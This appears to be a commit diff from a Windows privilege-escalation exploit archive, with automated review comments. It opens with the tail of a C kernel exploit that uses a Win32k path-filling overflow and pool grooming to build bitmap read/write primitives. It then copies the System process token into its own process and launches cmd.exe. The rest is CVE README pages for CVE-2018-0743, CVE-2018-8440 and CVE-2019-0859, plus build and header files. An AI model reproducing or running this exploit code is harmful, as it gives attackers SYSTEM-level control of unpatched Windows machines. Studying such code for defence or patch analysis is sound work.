if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
krnlbase = Bases[0];
}
return krnlbase;
}
// Get EPROCESS for System process
ULONG64 PsInitialSystemProcess()
{
// load ntoskrnl.exe
ULONG64 ntos = (ULONG64)LoadLibrary("ntoskrnl.exe");
// get address of exported PsInitialSystemProcess variable
ULONG64 addr = (ULONG64)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
FreeLibrary((HMODULE)ntos);
ULONG64 res = 0;
ULONG64 ntOsBase = GetNTOsBase();
// subtract addr from ntos to get PsInitialSystemProcess offset from base
if (ntOsBase) {
ReadFromAddress(addr - ntos + ntOsBase, (BYTE *)&res, sizeof(ULONG64));
}
return res;
}
// Get EPROCESS for current process
ULONG64 PsGetCurrentProcess()
{
ULONG64 pEPROCESS = PsInitialSystemProcess();// get System EPROCESS
// walk ActiveProcessLinks until we find our Pid
LIST_ENTRY ActiveProcessLinks;
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
ULONG64 res = 0;
while (TRUE) {
ULONG64 UniqueProcessId = 0;
// adjust EPROCESS pointer for next entry
pEPROCESS = (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
// get pid
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE *)&UniqueProcessId, sizeof(ULONG64));
// is this our pid?
if (GetCurrentProcessId() == UniqueProcessId) {
res = pEPROCESS;
break;
}
// get next entry
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
// if next same as last, we reached the end
if (pEPROCESS == (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64))
break;
}
return res;
}
void main(int argc, char* argv[]) {
HDC hdc = GetDC(NULL);
HDC hMemDC = CreateCompatibleDC(hdc);
HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL);
HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);
static POINT points[0x3fe01];
for (int l = 0; l < 0x3FE00; l++) {
points[l].x = 0x5a1f;
points[l].y = 0x5a1f;
}
points[2].y = 20;
points[0x3FE00].x = 0x4a1f;
points[0x3FE00].y = 0x6a1f;
if (!BeginPath(hMemDC)) {
fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError());
}
for (int j = 0; j < 0x156; j++) {
if (j > 0x1F && points[2].y != 0x5a1f) {
points[2].y = 0x5a1f;
}
if (!PolylineTo(hMemDC, points, 0x3FE01)) {
fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError());
}
}
EndPath(hMemDC);
//Kernel Pool Fung=Shuei
fungshuei();
//getchar();
fprintf(stdout, "[+] Trigerring Exploit.\r\n");
//__debugbreak();
if (!FillPath(hMemDC)) {
fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError());
}
printf("%s\r\n", "Done filling.");
HRESULT res;
VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!fake) {
fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError());
}
memset(fake, 0x1, 0x100);
bits = malloc(0x1000);
memset(bits, 0x42, 0x1000);
for (int k = 0; k < 5000; k++) {
res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1
if (res > 0x150) {
fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k);
/*fprintf(stdout, "Printing Bits:\r\n");
for (int i = 1; i < 0x1000; i++) {
fprintf(stdout, "%02x", bits[i]);
}*/
hManager = bitmaps[k];
hWorker = bitmaps[k + 1];
// Get Gh05 header to fix overflown header.
static BYTE Gh04[0x9];
fprintf(stdout, "\r\nGh04 header:\r\n");
for (int i = 0; i < 0x10; i++) {
Gh04[i] = bits[0x1d0 + i];
fprintf(stdout, "%02x", bits[0x1d0 + i]);
}
// Get Gh05 header to fix overflown header.
static BYTE Gh05[0x9];
fprintf(stdout, "\r\nGh05 header:\r\n");
for (int i = 0; i < 0x10; i++) {
Gh05[i] = bits[0xd90 + i];
fprintf(stdout, "%02x", bits[0xd90 + i]);
}
// Address of Overflown Gh04 object header
static BYTE addr1[0x7];
fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n");
for (int j = 0; j < 0x8; j++) {
addr1[j] = bits[0x210 + j];
fprintf(stdout, "%02x", bits[0x210 + j]);
}
//Get pvscan0 address of second Gh05 object
static BYTE* pvscan[0x07];
fprintf(stdout, "\r\nPvsca0:\r\n");
for (int i = 0; i < 0x8; i++) {
pvscan[i] = bits[0xdf0 + i];
fprintf(stdout, "%02x", bits[0xdf0 + i]);
}
// Calculate address to overflown Gh04 object header.
addr1[0x0] = 0;
int u = addr1[0x1];
u = u - 0x10;
addr1[1] = u;
//Fix overflown Gh04 object Header
//__debugbreak();
SetAddress(addr1);
//__debugbreak();
WriteToAddress(Gh04);
// Calculate address to overflown Gh05 object header.
addr1[0] = 0xc0;
int y = addr1[1];
y = y + 0xb;
addr1[1] = y;
//Fix overflown Gh05 object Header
SetAddress(addr1);
WriteToAddress(Gh05);
// get System EPROCESS
ULONG64 SystemEPROCESS = PsInitialSystemProcess();
//__debugbreak();
//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
ULONG64 CurrentEPROCESS = PsGetCurrentProcess();
//__debugbreak();
//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
ULONG64 SystemToken = 0;
// read token from system process
ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8);
// write token to current process
ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
SetAddress((BYTE *)&CurProccessAddr);
WriteToAddress((BYTE *)&SystemToken);
// Done and done. We're System :)
system("cmd.exe");
break;
}
if (res == 0) {
fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError());
}
}
//getchar();
//clean up
DeleteObject(bitobj);
DeleteObject(bitmap);
DeleteDC(hMemDC);
ReleaseDC(NULL, hdc);
VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE);
//free(points);
}
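Review bot: removing main.c takes with it the only statement of which build this PoC was written for: `VersionSpecificConfig gConfig = { 0x2e0, 0x348 }; //win 8.1` hard-codes EPROCESS UniqueProcessId/Token offsets for Windows 8.1, and the code is 64-bit throughout (`ULONG64` pointers, `EnumDeviceDrivers` base lookup, a fixed `VirtualAlloc` address above 4 GB), whereas the English README's ImpactVersion table lists x86/x64 for Windows 7, 8.1 and 10 with an empty Tested column. Record in the README that the archived PoC targets Windows 8.1 x64 only, so readers do not assume every listed row is covered by the archive.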

@@ -1,23 +0,0 @@
### CVE-2018-0743
#### 描述
用于Linux的Windows子系统由于在内存中处理对象的方式而存在特权提升漏洞也称为“ Linux特权提升Windows子系统”。
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| -------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64 | 1703 | | |
| Windows 10 | x86/x64 | 1709 | | |
| Windows Server | | 1709 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0743
```
#### 利用方式
暂无
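Review bot: this deletes the only page for CVE-2018-0743 (Windows Subsystem for Linux elevation of privilege, Windows 10 1703/1709 and Windows Server 1709) together with its affected-version table and advisory link, and the commit message "fix some bugs" gives no reason. If the entry is dropped because there is no PoC (`利用方式: 暂无`), say so in the commit message or keep the page with that note, since the other entries in this commit keep pages for untested CVEs; either way, any index that still references this page must be updated in the same change.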

Binary file not shown.

@@ -32,7 +32,11 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- [sourceincite](https://github.com/sourceincite/CVE-2018-8440)
#### 分析文章
- https://blog.0patch.com/2018/08/how-we-micropatched-publicly-dropped.html
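Review bot: under `#### 利用方式` the existing `暂无` (none) is immediately followed by the new sentence saying an EXP/PoC archive is kept in the root directory, so the section now states both that there is no exploit and that one is stored; remove `暂无` or turn it into a note that the archive is untested. The English README for this CVE in the same commit (`#### Utilization`) carries only the archive sentence, which is the consistent version.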

@@ -0,0 +1,49 @@
### CVE-2018-8440
#### Describe
An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC), aka "Windows ALPC Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 10 | x86/x64 | 1703 | | |
| Windows 10 | x86/x64 | 1709 | | |
| Windows 10 | x86/x64 | 1803 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | |
| Windows Server 2008 | x86/x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server | | 1709 | | |
| Windows Server | | 1803 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- [sourceincite](https://github.com/sourceincite/CVE-2018-8440)
#### Analyse
- https://blog.0patch.com/2018/08/how-we-micropatched-publicly-dropped.html
- https://blog.0patch.com/2018/09/comparing-our-micropatch-with.html
- https://www.anquanke.com/post/id/169382

Binary file not shown.

@@ -29,12 +29,16 @@
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1215
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- [Sheisback](https://github.com/Sheisback/CVE-2019-0859-1day-Exploit)
#### 分析文章
- https://www.secrss.com/articles/9942
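Review bot: the `#### 修复补丁` block lists the advisory for CVE-2019-1215 next to CVE-2019-0859, but 1215 is a different vulnerability and the English README for this entry (`#### Patch`) links 0859 only; the 1215 line looks carried over from another entry (the CVE-2016-3309 English README in this commit also links a CVE-2019-1215 repository by mistake) and should be removed. As in the CVE-2018-8440 file, `暂无` under `#### 利用方式` contradicts the new sentence that an archive is stored in the root directory.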

@@ -0,0 +1,51 @@
### CVE-2019-0859
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0685, CVE-2019-0803
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 10 | x86/x64 | 1703 | | |
| Windows 10 | x86/x64/ARM64 | 1709 | | |
| Windows 10 | x86/x64/ARM64 | 1803 | | |
| Windows 10 | x86/x64/ARM64 | 1809 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | |
| Windows Server 2008 | x86/x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1709 | | |
| Windows Server | | 1803 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- [Sheisback](https://github.com/Sheisback/CVE-2019-0859-1day-Exploit)
#### Analyse
- https://www.secrss.com/articles/9942
- https://blog.csdn.net/blackorbird/article/details/102462546
- https://www.4hou.com/posts/3jRO
- https://nosec.org/home/detail/2490.html

Binary file not shown.

@@ -1,31 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.27703.2018
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exp", "exp\exp.vcxproj", "{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Debug|x64.ActiveCfg = Debug|x64
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Debug|x64.Build.0 = Debug|x64
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Debug|x86.ActiveCfg = Debug|Win32
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Debug|x86.Build.0 = Debug|Win32
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Release|x64.ActiveCfg = Release|x64
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Release|x64.Build.0 = Release|x64
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Release|x86.ActiveCfg = Release|Win32
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {84B731B2-AA7A-4ED9-BE27-C6B2DB02A0B1}
EndGlobalSection
EndGlobal

@@ -1,256 +0,0 @@
#pragma once
#include <Windows.h>
#include <tlhelp32.h>
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;
typedef struct _HANDLEENTRY {
PVOID phead;
PVOID pOwner;
BYTE bType;
BYTE bFlags;
WORD wUniq;
}HANDLEENTRY, *PHANDLEENTRY;
typedef struct _SERVERINFO {
#ifdef _WIN64
UINT64 dwSRVIFlags;
UINT64 cHandleEntries;
#else
DWORD dwSRVIFlags;
DWORD cHandleEntries;
#endif
WORD wSRVIFlags;
WORD wRIPPID;
WORD wRIPError;
}SERVERINFO, *PSERVERINFO;
typedef struct _SHAREDINFO {
PSERVERINFO psi;
PHANDLEENTRY aheList;
ULONG HeEntrySize;
ULONG_PTR pDispInfo;
ULONG_PTR ulSharedDelta;
ULONG_PTR awmControl;
ULONG_PTR DefWindowMsgs;
ULONG_PTR DefWindowSpecMsgs;
}SHAREDINFO, *PSHAREDINFO;
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG NumberOfModules;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
// Partial PEB
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
union
{
BOOLEAN BitField;
struct
{
BOOLEAN ImageUsesLargePages : 1;
BOOLEAN IsProtectedProcess : 1;
BOOLEAN IsLegacyProcess : 1;
BOOLEAN IsImageDynamicallyRelocated : 1;
BOOLEAN SkipPatchingUser32Forwarders : 1;
BOOLEAN SpareBits : 3;
};
};
HANDLE Mutant;
PVOID ImageBaseAddress;
PVOID Ldr;
PVOID ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PRTL_CRITICAL_SECTION FastPebLock;
PVOID AtlThunkSListPtr;
PVOID IFEOKey;
union
{
ULONG CrossProcessFlags;
struct
{
ULONG ProcessInJob : 1;
ULONG ProcessInitializing : 1;
ULONG ProcessUsingVEH : 1;
ULONG ProcessUsingVCH : 1;
ULONG ProcessUsingFTH : 1;
ULONG ReservedBits0 : 27;
};
ULONG EnvironmentUpdateCount;
};
union
{
PVOID KernelCallbackTable;
PVOID UserSharedInfoPtr;
};
ULONG SystemReserved[1];
ULONG AtlThunkSListPtr32;
PVOID ApiSetMap;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[2];
PVOID ReadOnlySharedMemoryBase;
PVOID HotpatchInformation;
PVOID *ReadOnlyStaticServerData;
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
LARGE_INTEGER CriticalSectionTimeout;
SIZE_T HeapSegmentReserve;
SIZE_T HeapSegmentCommit;
SIZE_T HeapDeCommitTotalFreeThreshold;
SIZE_T HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
PVOID *ProcessHeaps;
PVOID GdiSharedHandleTable;
} PEB, *PPEB;
template <class T>
struct LIST_ENTRY_T
{
T Flink;
T Blink;
};
template <class T>
struct UNICODE_STRING_T
{
union
{
struct
{
WORD Length;
WORD MaximumLength;
};
T dummy;
};
T _Buffer;
};
template <class T, class NGF, int A>
struct _PEB_T
{
union
{
struct
{
BYTE InheritedAddressSpace;
BYTE ReadImageFileExecOptions;
BYTE BeingDebugged;
BYTE _SYSTEM_DEPENDENT_01;
};
T dummy01;
};
T Mutant;
T ImageBaseAddress;
T Ldr;
T ProcessParameters;
T SubSystemData;
T ProcessHeap;
T FastPebLock;
T _SYSTEM_DEPENDENT_02;
T _SYSTEM_DEPENDENT_03;
T _SYSTEM_DEPENDENT_04;
union
{
T KernelCallbackTable;
T UserSharedInfoPtr;
};
DWORD SystemReserved;
DWORD _SYSTEM_DEPENDENT_05;
T _SYSTEM_DEPENDENT_06;
T TlsExpansionCounter;
T TlsBitmap;
DWORD TlsBitmapBits[2];
T ReadOnlySharedMemoryBase;
T _SYSTEM_DEPENDENT_07;
T ReadOnlyStaticServerData;
T AnsiCodePageData;
T OemCodePageData;
T UnicodeCaseTableData;
DWORD NumberOfProcessors;
union
{
DWORD NtGlobalFlag;
NGF dummy02;
};
LARGE_INTEGER CriticalSectionTimeout;
T HeapSegmentReserve;
T HeapSegmentCommit;
T HeapDeCommitTotalFreeThreshold;
T HeapDeCommitFreeBlockThreshold;
DWORD NumberOfHeaps;
DWORD MaximumNumberOfHeaps;
T ProcessHeaps;
T GdiSharedHandleTable;
T ProcessStarterHelper;
T GdiDCAttributeList;
T LoaderLock;
DWORD OSMajorVersion;
DWORD OSMinorVersion;
WORD OSBuildNumber;
WORD OSCSDVersion;
DWORD OSPlatformId;
DWORD ImageSubsystem;
DWORD ImageSubsystemMajorVersion;
T ImageSubsystemMinorVersion;
union
{
T ImageProcessAffinityMask;
T ActiveProcessAffinityMask;
};
T GdiHandleBuffer[A];
T PostProcessInitRoutine;
T TlsExpansionBitmap;
DWORD TlsExpansionBitmapBits[32];
T SessionId;
ULARGE_INTEGER AppCompatFlags;
ULARGE_INTEGER AppCompatFlagsUser;
T pShimData;
T AppCompatInfo;
UNICODE_STRING_T<T> CSDVersion;
T ActivationContextData;
T ProcessAssemblyStorageMap;
T SystemDefaultActivationContextData;
T SystemAssemblyStorageMap;
T MinimumStackCommit;
};
typedef _PEB_T<DWORD, DWORD64, 34> PEB32;
typedef _PEB_T<DWORD64, DWORD, 30> PEB64;
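Review bot: the hand-written `typedef struct _PEB { ... } PEB, *PPEB;` reuses the exact tag and typedef names that `<winternl.h>` already declares, so any translation unit that pulls in both (directly or through another SDK header) fails with a redefinition error; give the partial layout a project-specific name, as was already done for the `_PEB_T` template with its `PEB32`/`PEB64` aliases. Since the `// Partial PEB` struct stops at `GdiSharedHandleTable`, a comment that `sizeof` on it is not the real PEB size would also save the next reader a surprise.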

View File

@@ -1,179 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>15.0</VCProjectVersion>
<ProjectGuid>{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>exp</RootNamespace>
<WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<AdditionalOptions> %(AdditionalOptions)</AdditionalOptions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<AdditionalOptions> %(AdditionalOptions)</AdditionalOptions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="exp.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="syscall_x64.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="exp.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<MASM Include="syscall_x64.asm">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExcludedFromBuild>
<FileType>Document</FileType>
</MASM>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
